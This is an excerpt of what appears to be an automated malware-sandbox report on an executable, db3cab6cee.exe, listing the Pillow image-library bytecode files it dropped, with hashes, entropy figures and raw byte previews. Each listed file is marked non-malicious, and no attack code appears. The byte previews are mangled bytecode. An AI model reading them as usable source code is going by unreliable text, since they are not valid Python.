                                                                                                                                            Preview:...........eE..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.........e...............Z...e.j.........d...............j.........Z.d.Z d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z!..e.j.........d...............Z"e.j#........Z$..d.e$z...Z%....G.d...d e...............Z&..G.d!..d"e...............Z'd#..Z(dKd$..Z)..G.d%..d&..............Z*..G.d'..d(e+..............Z,..G.d)..d*..............Z-..G.d+..d,e*..............Z.d-..Z/..G.d...d/e.j.......................Z0d0d1d2d3d4d5d6d6d6d7d8d9d:d;d<d=..Z1d>..Z2..G.d?..d@..............Z3..G.dA..dB..............Z4dC..Z5dD..Z6e2dEf.dF..Z7dG..Z8..e.j9........e0j:........e0e/..................e.j;........e0j:........e7..................e.j<........e0j:........e6..................e.j=........e0j:........dHdIg...................e.j>........e0j:........dJ................d.S.)L.....)...annotationsN)...IntEnum.....)...Ima

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\PpmImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13906
                                                                                                                                            Entropy (8bit):5.327133256677727
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:AI1QysJG6WQIGCIgeNxMsiRC5RYsN8l6orfPS/VdGA:BqyoHvIGCIgebPiRKYsNq6orf6t
                                                                                                                                            MD5:6FBA977395AF0022CA1AD73C633376A6
                                                                                                                                            SHA1:238D3C6E292A36652523342E224FB24B463273D3
                                                                                                                                            SHA-256:0D17DF3ACD6002C0B68AA445B2809D34FCD498103DFA5F2B28BC510FA593A7CD
                                                                                                                                            SHA-512:AF0B82B3E7F2B18B99F5BA542BDDE5D5E078465BD3E3AD5ABE7FD91D5BD948C47D4024D0579669D118E46F9E739DF172D37F36986330FC3CBC57C58DBFDA1B3A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.-..............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.d.d.d.d.d.d.d.d.d.d...Z.d...Z...G.d...d.e.j.......................Z...G.d...d.e.j.......................Z...G.d...d.e.j.......................Z.d...Z...e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........d.e...................e.j.........d.e...................e.j.........e.j.........g.d.....................e.j.........e.j.........d.................d.S.)......)...annotations.....)...Image..ImageFile)...i16be)...o8)...o32les.... .......1..L..RGB..CMYK..P..RGBA)......P1.....P2.....P3.....P4.....P5.....P6s....P0CMYKs....PyPs....PyRGBAs....PyCMYKc.....................2.....|.d.d.............d.k.....o.|.d...........d.v.S.).Nr....r.........Ps....0123456y..)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\PpmImagePlugin.py.._acceptr....-...s#.........!.A.#.;.$.....;.6.!.9...#;..;.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\PsdImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10627
                                                                                                                                            Entropy (8bit):5.149525816418356
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:+d5w4K40uG7hhHXrDcoIcN5l/v99yb83WUWoZ93SSSkn:+d5w4KfuGNVDcG/v/imWUWQ
                                                                                                                                            MD5:6A2C05F9665BB44FFCA9A7678437682B
                                                                                                                                            SHA1:E2F02F28916F7D493D062DE02499C8AFD70EC8D8
                                                                                                                                            SHA-256:85D694A8CF983CEDB78B7DF5EA51B4310FF08689EB0B34F14DF4BD51BBB2CB2E
                                                                                                                                            SHA-512:B415C5D81CFB0DE7BBD7ECB2690AE5B37D358782CCC572EE768AE2AFA676423068F02F1C0F8507797D7E15AD04B9010AC2EE897913D909FDE21B529E4ABF12F1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eD.........................4.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.d.d.d.d.d.d.d.d...Z.d...Z...G.d...d.e.j.......................Z.d...Z.d...Z...e.j.........e.j.........e.e...................e.j.........e.j.........d...................e.j.........e.j.........d.................d.S.)......)...annotationsN.....)...Image..ImageFile..ImagePalette)...i8)...i16be)...i32be)...si16be)...1r....)...Lr....)...Pr....)...RGB.....)...CMYK.....)...LABr....).).r....r....).r.........).r....r....)......r....).r....r....).r....r....)......r....).r....r....)......r....c...........................|.d.d.............d.k.....S.).Nr....s....8BPS..)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\PsdImagePlugin.py.._acceptr........s..........".1.".:.... .. .....c.....................,.....e.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.S.)...PsdImageFile..PSDz.Adobe PhotoshopFc.......................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\PyAccess.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17815
                                                                                                                                            Entropy (8bit):5.096104791992567
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:zg8y4qPvdnrhf0UxMOJ/BdWqnz6fYAAATVbDhAm:zlyBPFnVf1J/BEqz61Wm
                                                                                                                                            MD5:38086A151B72D749FA022BE727B5FC3B
                                                                                                                                            SHA1:F4B2B9BB276B0D8E59F0331752C4F95EBE9C889B
                                                                                                                                            SHA-256:70DE7B02858256584CD56810845DFD7C5644786C26DB104C46D1B81332603F69
                                                                                                                                            SHA-512:6AD406395987ECF41032A18D3219C1C8626708D254062568408DE8E367D75F3E5E0550054C5C8DA966A2C1E08D0B227852865ED93829067B926A70AE2BA70502
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e!(..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....d.d.l.m.Z...d.Z...e...............Z.e.......................e.................n*#.e.$.r"Z.d.d.l.m.Z.....e.j.........e...............x.Z.Z.Y.d.Z.[.n.d.Z.[.w.w.x.Y.w...e.j.........e...............Z...G.d...d...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.i.d.e...d.e...d e...d!e...d"e...d#e...d$e...d%e...d&e...d'e...d(e...d)e...d*e...d+e...d,e...d-e...d.e...Z.e.j.........d/k.....r.e.e.d0<...e.e.d1<...e.e.d2<...e.e.d3<...e.e.d4<...n.e.e.d0<...e.e.d1<...e.e.d2<...e.e.d3<...e.e.d4<...d7d6..Z.d.S.)8.....)...annotationsN.....)...deprecate)...FFIz|. struct Pixel_RGBA {. unsigned char r,g,b,a;. };. struct Pixel_I16 {. unsigned char l,r;. };.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\QoiImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6734
                                                                                                                                            Entropy (8bit):5.283508878360411
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:QnAfIa5MODonIpvXMs2tqJXb66bgvLmwLvV77tnhTSSS+:QgMOZpvcGUvL5vV77D
                                                                                                                                            MD5:DAE908D50AEBA8445C6EFD03F7D16EDD
                                                                                                                                            SHA1:F4D5A5B1D9698E668F257FD6EFD5D7EE247B1E39
                                                                                                                                            SHA-256:C1ECFF06050AA43934FB7D71E85A697E817B56A62410E384B13AE11B807EE622
                                                                                                                                            SHA-512:5D83140D8EB6010E5BC7D11CBE167E4ADC4CEBDD6183A55AFF3E99223938925AFDEE225BC347633C5A59E6AB8E1C3991282FAE4697E7CE4828DD8CE0597A2049
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j.......................Z...G.d...d.e.j.......................Z...e.j.........e.j.........e.e...................e.j.........d.e...................e.j.........e.j.........d.................d.S.)......)...annotationsN.....)...Image..ImageFile)...i32be....o8c...........................|.d.d.............d.k.....S.).N.....s....qoif..)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\QoiImagePlugin.py.._acceptr........s..........".1.".:.... .. .....c...........................e.Z.d.Z.d.Z.d.Z.d...Z.d.S.)...QoiImageFile..QOIz.Quite OK Imagec.............................t.............j...............................d.............................s.d.}.t...........|.................t.............f.d...t...........d...............D..............................._...........j...............................d...............d.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\SgiImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8453
                                                                                                                                            Entropy (8bit):5.101189341950115
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:DGThGu4iMcL+1BKCwfkydCL/SoBA0SSSltGN:DGTwc2B0vCLes
                                                                                                                                            MD5:5586C3AE1E47E5E75C7ECC8A2AB36047
                                                                                                                                            SHA1:F9E205C2973007856E29D132136C5F817406D7D4
                                                                                                                                            SHA-256:1D2B21D837DDF1C454CB6DC4E186F019A8A7526ABBCD42EFCAF9B1C1BB9955A6
                                                                                                                                            SHA-512:AE22895A79A19456FCE42A843315AC28958BB030A7D6C6AD13C6114413E6586338230D36691FC0F035EACFC328E00D7E6D2B96A00848B1D211DEF2203C49C471
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z.d.d.d.d.d.d.d.d.d...Z...G.d...d.e.j.......................Z.d...Z...G.d...d.e.j.......................Z...e.j.........d.e...................e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........e.j.........d...................e.j.........e.j.........g.d...................d.S.)......)...annotationsN.....)...Image..ImageFile)...i16be)...o8c.....................N.....t...........|...............d.k.....o.t...........|...............d.k.....S.).N..........)...len..i16)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\SgiImagePlugin.py.._acceptr....!...s#.........v.;.;.!.....2...F.....s. 2..2.......L..L;16B..RGBz.RGB;16B..RGBAz.RGBA;16B).).r....r....r....).r....r....r....).r....r....r....).r....r....r....).r.........r....).r....r....r....).r....r.........).r....r....r....c....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\SpiderImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12797
                                                                                                                                            Entropy (8bit):5.238407012162774
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:EdRAXeQQNJ9PiBCq2a5Xc9+c7chJjuqgsxJopq4KMvtw2R9o:UAfOncqa5Xc9+cw5uqvxi22A
                                                                                                                                            MD5:F94F442C5FE4E71C70879642AC685834
                                                                                                                                            SHA1:BAB391AA2D9E386FEED290AF8B7AF7AB8BD85E97
                                                                                                                                            SHA-256:6DF65317369CA42FE8B84CB8104CE04B81373A6F286086CD67DFCB990402836F
                                                                                                                                            SHA-512:E68445E6D6FE2D8B1AD8B63F2FEC04C33134BBC9A4426C4E2FD22A14605DEEB1FC7BE3C7128BF66BD1779D1FC69B05A6E3623E6E1405CCA08558A6BF42AF2F29
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e9&........................D.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d...Z.g.d...Z.d...Z.d...Z...G.d...d.e.j.......................Z.d.d...Z.d...Z.d...Z.d...Z...e.j.........e.j.........e...................e.j.........e.j.........e.................e.d.k.......r...e.e.j.......................d.k.....r...e.d...................e.j.........................e.j.........d...........Z...e.e...............s...e.d...................e.j...........................e.j.........e...............5.Z...e.d...e.e...............z.....................e.d...e.e.j.......................z.....................e.d...e.e.j.......................z.....................e.d...e.e.j.......................z.....................e.d.d.....................e.e.......................................................e.e.j.......................d.k.....rqe.j.........d...........Z e..!....................e.j"........j#......................Z...e.d.e.j$.........%....................e.................d.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\SunImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3535
                                                                                                                                            Entropy (8bit):5.450726617979006
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:LF97UbBL2fwaEO050jbNxSlRErQnD8qOfekKD/Wpbd+m0Ev+aCvTfg0W+kW:xWbBWKO05UrW2eD08CpiEGhrfg0Hj
                                                                                                                                            MD5:9AD7D1324FC9CFC54104FE8E6B9A1F74
                                                                                                                                            SHA1:44A2EBC6E14F616A1E448F88A40739BCA71175DE
                                                                                                                                            SHA-256:D1A19F983CD42C2CA3A4AC0BC312A997D81CA6725B2789154D851966B3972AED
                                                                                                                                            SHA-512:84F717934208899B8002C5671C3764DC121BC6BBB7E7C0C4AC7FBCD3A2FC753BD7C10A911B28068A277E18B7523A98B0C7E8A14D5B9DAE6BCB60C56A2ABD9A8B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j.......................Z...e.j.........e.j.........e.e...................e.j.........e.j.........d.................d.S.)......)...annotations.....)...Image..ImageFile..ImagePalette)...i32bec.....................N.....t...........|...............d.k.....o.t...........|...............d.k.....S.).N.....i.j.Y)...len..i32)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\SunImagePlugin.py.._acceptr........s#.........v.;.;.!.....9...F.....z. 9..9.....c...........................e.Z.d.Z.d.Z.d.Z.d...Z.d.S.)...SunImageFile..SUNz.Sun Raster Filec.....................4.....|.j...............................d...............}.t...........|...............s.d.}.t...........|.................d.}.t...........|.d...............t...........|.d...............f.|._.........t...........|.d...............}.t...........|.d...............}.t...........|.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\TarIO.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3007
                                                                                                                                            Entropy (8bit):5.228774644809422
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:oVR1oENnyc0/0cm2oJO4kMUh2rI1y/t3/BK6XABs8tg/QMT2BqQji86v2w9N:kogniRoJO1Mu16t3/g6XAW3/jqiBR
                                                                                                                                            MD5:7DE56C05B2C1838D2F2B15528CAF9355
                                                                                                                                            SHA1:95D78F51CC03717B0525BB266ABA361A3D92A75D
                                                                                                                                            SHA-256:21AB44D0CAEAA8BE3EF1A87628A356FF9E4EBF6ECA4497D857DB33A8B6A2C130
                                                                                                                                            SHA-512:10D625CE962D9CBAF190749DBEB8500BC64F54D00392C809A5E4B98E984D4FD82FFED35B661AC5D6A8E1AA1607073A6B4CCE9463973A5D3CCA1790EC145610F8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................d.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j.........e.........................Z.d.S.)......)...annotationsN)...TracebackType.....)...ContainerIOc.....................<.......e.Z.d.Z.d.Z.d...f.d...Z.d.d...Z.d.d...Z.d.d...Z...x.Z.S.)...TarIOzHA file object that provides read access to a given member of a TAR file...tarfile..str..file..return..Nonec.....................v.......t...........|.d...............|._...........|.j...............................d...............}.t...........|...............d.k.....r.d.}.t...........|.................|.d.d...................................d...............}.|.......................d...............}.|.d.k.....r.d.}.t...........|.................|.d.k.....r.|.d.|.............}.t...........|.d.d.............d...............}.|.|.k.....r.n,|.j...............................|.d.z...d.z...t...........j...........................t...............................................|.j.........|.j......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\TgaImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8097
                                                                                                                                            Entropy (8bit):5.2235495645256895
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:fn8anLrr9jc7vB5zGiSlRczs+ssqfIDsNRsd2uNlPD4eSSSth:fndnvrRcbBAsCRqNq
                                                                                                                                            MD5:73566CDEC5FF0F15A8ACCFFBFFC76F9D
                                                                                                                                            SHA1:2541FEC751D56BB07319A7F538F0A3ED20555929
                                                                                                                                            SHA-256:6C274FAB13108AD51F9461FAA74DA1DEE6F486F8678332B762A68E6F9432578D
                                                                                                                                            SHA-512:B7B3561D643ACD88F8DADF92AE09265DF05169AFDCE0522B66E0FE7A1E3B22B75E4EE068A60ACAAADE54B2503B8F439588BB79CF28337237157C03A01F287456
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................X.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.d.d.d.d.d.d...Z...G.d...d.e.j.......................Z.d.d.d.d.d.d.d...Z.d...Z...e.j.........e.j.........e...................e.j.........e.j.........e...................e.j.........e.j.........g.d.....................e.j.........e.j.........d.................d.S.)......)...annotationsN.....)...Image..ImageFile..ImagePalette)...i16le)...o8)...o16le..P..1..L..LAz.BGR;5..BGR..BGRA).).r.........)......r....).r....r....).r.........)......r....).r.........).r..... ...c.....................".....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d.S.)...TgaImageFile..TGA..Targac...........................|.j...............................d...............}.|.d...........}.|.d...........}.|.d...........}.|.d...........}.|.d...........}.t...........|.d...............t...........|.d...............f.|._.........|.d.v.s&|.j.........d...........d.k.....s.|.j.........d...........d.k.....s.|.d.v.r.d.}.t

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\TiffImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):99339
                                                                                                                                            Entropy (8bit):5.423831081405747
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:pqto4qpOtXyo/9hqA60TITptMUEtTxT7w+u+ualnyVuMlfMau3s8rF:uXyovpTITf4TxTMxCyVuwuhF
                                                                                                                                            MD5:5A36FBD5EA918255B7BE42B2C20D6D84
                                                                                                                                            SHA1:93841E28082413140CAF2F2BBF9C90F4853F7CE7
                                                                                                                                            SHA-256:D3C3EDBB56D6656AA21A18E977887D0D611FC049AF24D227C0BDC06EB5983FCD
                                                                                                                                            SHA-512:D151360311F3D965154ACF751EAD5658FFBF52F61D0C5A770D659BE7ABA12D01B008D41FA12973671EEE8E1BE6DD23D299A4D07A4741B2B3ACBF2A8D2411C9D7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.4...............#.............d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.........e...............Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(d.Z)d.Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d Z6d!Z7d"Z8d#Z9d$Z:d%Z;d&Z<d'Z=d(Z>d)Z?d*Z@d+ZAd,ZBd-ZCd.ZDd/ZEd0ZFd1ZGd2ZHd3ZId4ZJd5ZKd6ZLd7ZMd8ZNi.d.d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..ZOdZ..eO.P..................................D...............ZQi.e%d.d[d.d[d\f.d]..e&d.d[d.d[d\f.d]..e%d.d[d:d[d\f.d^..e&d.d[d:d[d\f.d^..e%d.d[d.d[d\f.d_..e&d.d[d.d[d\f.d_..e%d.d[d:d[d\f.d`..e&d.d[d:d[d\f.d`..e%d.d[d.dad\f.db..e&d.d[d.dad\f.db..e%d.d[d:dad\f.dc..e&d.d[d:dad\f.dc..e%d.d[d.dad\f.dd..e&d.d[d.dad\f.dd..e%d.d[d:dad\f.de..e&d.d[d:dad\f.de..e%d.d[d.dfd\f.dg..i.e&d.d[d.dfd\f.dg..e%d.d[d:dfd\f.dh..e&d.d[d:dfd\f.dh..e%d.d[d.dfd\f.di..e&d.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\TiffTags.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18402
                                                                                                                                            Entropy (8bit):6.204627087015899
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:qd8GDQO55WpXvA9XW9f6qUQ2nVSPX/smO:M35aOLnqUmO
                                                                                                                                            MD5:1C2D03AA7A1E595C9E5C5A401C2175D4
                                                                                                                                            SHA1:8929128153F58CCA48F667BD6B8E9AC137332161
                                                                                                                                            SHA-256:331FDEC2BD2E1311C136E1359B8D6702E87D53E4AB36EC15CFABC96083446B38
                                                                                                                                            SHA-512:B5DD04B1ADAA933B3354BBFF787FB8B283B2FA68E096567FD8F2A216E423654924AE27E11309B84CBE74CB93984334970F6A3EE1B7BD4458BE7EFCF6BC76EE40
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.B..............................d.d.l.m.Z...d.d.l.m.Z.....G.d...d...e.d.d.............................Z...d!d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d e.d.f...d!d"e.d.d.d.d.d.d.d.d#d$..f...d%d&e.d.d.d.d.d.d.d.d.d.d'd(d)..f...d*d+e.d.f...d,d-e.d.f...d.d/e.d.f...d0d1e.d.f...d2d3e.d.f...d4d5e.d.f...d6d7e.d.f...d8d9e.d.f...d:d;e.d.f...d<d=e.d.f...i.d>d?e.d.f...d@dAe.d.f...dBdCe.d.f...dDdEe.d.f...dFdGe.d.f...dHdIe.d.f...dJdKe.d.f...dLdMe.d.d.d.dN..f...dOdPe.d.f...dQdRe.d.f...dSdTe.d.f...dUdVe.d.f...dWdXe.d.f...dYdZe.d.f...d[d\e.d.f...d]d^e.d.f...d_d`e.d.f.....i.dadbe.d.d.d.d.dc..f...dddee.d.f...dfdge.d.f...dhdie.d.f...djdke.d.f...dldme.d.f...dndoe.d.f...dpdqe.d.d.d.dr..f...dsdte.d.f...dudve.d.f...dwdxe.d.f...dydze.d.f...d{d|e.d.f...d}d~e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f.....i.d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\WalImageFile.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4111
                                                                                                                                            Entropy (8bit):5.741455356213651
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:7bBpW9P7lq5qLk5uObmtjWOeFnjaOlvs7O98W5:7bLqPZq5qLkJKjWOGOOt8m
                                                                                                                                            MD5:09138858C0DE9D3C9DB4F83DD5592999
                                                                                                                                            SHA1:7FF213CB2E263931432481CA7A166707372F65AA
                                                                                                                                            SHA-256:0F4E74921AB2AABE7CB0029988A6FFE65E56FF20523B05F28C1C2C72C19C914F
                                                                                                                                            SHA-512:790110D5082DBAD438AD4AFE4986E9E38951902794933FDCC9D7830E7EB2C77562ED0319EFC578EEBF279DFDFEB12D9F6394377C0BBC620517B717CC93231686
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e/.........................b.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.j.......................Z.d...Z.d.Z.d.S.).a.....This reader is based on the specification available from:.https://www.flipcode.com/archives/Quake_2_BSP_File_Format.shtml.and has been tested with a few sample files found using google..... note::. This format cannot be automatically recognized, so the reader. is not registered for use with :py:func:`PIL.Image.open()`.. To open a WAL file, use the :py:func:`PIL.WalImageFile.open()` function instead.......)...annotations.....)...Image..ImageFile)...i32lec.....................".....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d.S.)...WalImageFile..WALz.Quake2 Texturec...........................d.|._.........|.j...............................d...............}.t...........|.d...............t...........|.d...............f.|._.........t...........j.........|.j.........................t...........|.d...............}.|.j...............................|....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\WebPImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15255
                                                                                                                                            Entropy (8bit):5.197356495588223
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Z8o+3S5UNkd6Zw0o9Wrh/1XOrQMrvj0R0MnMcBesVMQHtEavjW9RVWWW6V+:uol5UNkgZ7oyDerQM47BeuMQYWWWj
                                                                                                                                            MD5:E5B463589431DC72A2C0AAFD6804932A
                                                                                                                                            SHA1:FB1620461BF6C686C71B816863A5E0BF25CAB8FE
                                                                                                                                            SHA-256:6404E6421102F4FCD9FFFD1EC841574F20EFAE87319AB4185F157EC251A1D756
                                                                                                                                            SHA-512:1FED4D50EDB9A7A30082591D12A0C967020E18D9FADBCE897BCBADA505D77F0A2ABD39A64BF72C02E39E469EBB9FE2A4837F046C943813216CCBD0177C5EC931
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.-.............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....d.d.l.m.Z...d.Z.n.#.e.$.r...d.Z.Y.n.w.x.Y.w.d.d.d.d...Z.d.d.d...Z.d.d.d.d...Z.d...Z...G.d...d.e.j.......................Z.d...Z.d...Z...e.j.........e.j.........e.e.................e.ra..e.j.........e.j.........e.................e.j.........r...e.j.........e.j.........e...................e.j.........e.j.........d...................e.j.........e.j.........d.................d.S.d.S.)......)...annotations)...BytesIO.....)...Image..ImageFile)..._webpTF)...RGBX..RGBA..RGB).r....r....r....r....).s....VP8 s....VP8Xs....VP8Lc..........................|.d.d.............d.k.....}.|.d.d.............d.k.....}.|.d.d.............t...........v.}.|.r.|.r.|.r.t...........s...d.S.d.S.d.S.d.S.d.S.).N.....s....RIFF..........s....WEBP.....zEimage file could not be identified because WEBP support not installedT)..._VP8_MODES_BY_IDENTIFIER..SUPPORTED)...prefix..is_riff_file_format..is_webp_file..is_valid_vp8_modes.... .g

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\WmfImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6315
                                                                                                                                            Entropy (8bit):5.1877938701064865
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:V4pH45bkRZtkQya+8rX4IhboMW8DE6EcRoeQR3KdwkvuR7XNDuLOD:V4pY5e+G4tt87me6R7XNDfD
                                                                                                                                            MD5:1F36B4F9F8F9F1338595F438F9F42602
                                                                                                                                            SHA1:7B22986077780E15780C7EAF9A2D84A6F9C79353
